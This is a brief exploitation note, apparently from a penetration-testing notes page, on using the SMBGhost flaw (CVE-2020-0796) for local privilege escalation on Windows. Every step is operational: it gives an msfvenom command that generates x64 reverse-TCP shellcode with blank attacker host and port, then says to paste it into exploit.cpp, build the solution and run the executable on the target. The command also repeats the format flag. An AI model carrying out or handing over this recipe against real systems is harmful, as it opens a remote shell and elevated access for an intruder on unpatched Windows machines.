smbGhost

CVE-2020-0796

Requirements:

  • Needs smb port 445 open on target

  • Visual Studio to compile code

CVE: CVE-2020-0796

Exploit using visual studio

  • Generate shellcode using

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp
  • Update shellcode in line 204 in exploit.cpp

  • set TARGET architecture x64

  • Build solution

Run file on target: cve-2020-0796-local.exe

Last updated